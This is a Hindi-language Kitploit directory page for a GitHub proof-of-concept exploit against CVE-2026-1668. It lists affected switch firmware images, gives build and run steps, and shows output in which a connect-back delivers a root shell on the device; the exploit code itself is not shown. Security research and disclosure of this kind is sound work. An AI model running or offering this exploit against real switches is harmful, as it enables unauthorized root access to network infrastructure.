Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-1668-poc — CVE-2026-1668 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। | Kitploit
उपकरण/GitHubGitHub/tangrs/cve-2026-1668-poc
एम्बेडेड सिस्टम सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगहार्डवेयर और IoT सुरक्षालर्निंग और शिक्षाफर्मवेयर विश्लेषणबाइनरी शोषण
GitHubtangrs/cve-2026-1668-poc

cve-2026-1668-poc

CVE-2026-1668 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट।

रिपॉजिटरी देखें
245 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2026-1668 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट

यह CVE-2026-1668 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है। यह केवल शैक्षिक उद्देश्यों के लिए है। कृपया उन सिस्टमों का शोषण करने का प्रयास न करें जिनके आप स्वामी नहीं हैं या जिनके लिए आपके पास स्पष्ट अनुमति नहीं है।

इस प्रूफ-ऑफ-कॉन्सेप्ट को निम्नलिखित SHA256 हैश वाली फर्मवेयर इमेज के विरुद्ध विकसित किया गया था: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544।

उस हैश से मेल खाने वाले ज्ञात फर्मवेयरों के नाम (अपूर्ण सूची):

  • SG2005P-PDv1_en_1.0.16_[20251031-rel72837]_up.bin
  • SG2008Pv3_en_3.20.14_[20251031-rel72837]_up.bin
  • SG2008v4_en_4.20.14_[20251031-rel72837]_up.bin
  • SG2016Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2210MPv4_en_4.20.15_[20251031-rel72837]_up.bin
  • SG2210MPv5_en_5.0.12_[20251031-rel72837]_up.bin
  • SG2210Pv5_en_5.20.15_[20251031-rel72837]_up.bin
  • SG2218Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2218Pv2_en_2.0.11_[20251031-rel72837]_up.bin
  • SG2218v1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2428LPv1_en_1.0.12_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.20.17_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.30.13_[20251031-rel72837]_up.bin
  • SG3210v3_en_3.20.14_[20251031-rel72837]_up.bin
  • SL2428Pv6_en_6.20.15_[20251031-rel72837]_up.bin
  • TL-SG2428Pv4_en_4.0.23_[20251031-rel72837]_up.bin

पुराने फर्मवेयर संस्करण भी संभवतः इस भेद्यता से प्रभावित हैं, लेकिन उनमें एक्सप्लॉइट पेलोड में मामूली बदलाव की आवश्यकता हो सकती है।

पेलोड कैसे काम करता है, इसका विवरण इस ब्लॉग पोस्ट में पाया जा सकता है।

निर्माण

पेलोड बनाने के लिए MIPS Linux GCC टूलचेन की आवश्यकता होती है। Ubuntu 24.04 पर, इसे sudo apt install gcc-mips-linux-gnu से स्थापित किया जा सकता है।

root@kitploit:~
$ make

चलाना

यह एक्सप्लॉइट HTTP सर्वर द्वारा अपना पहला अनुरोध पूरा करने से पहले चलाया जाना चाहिए (अर्थात एक नए बूट पर)।

root@kitploit:~
$ ./run.sh

स्क्रिप्ट आपको रूट शेल में पहुँचा देनी चाहिए। यदि नहीं, तो एक्सप्लॉइट विफल हो गया है।

root@kitploit:~
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json

{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc # 
टूल डाउनलोड करें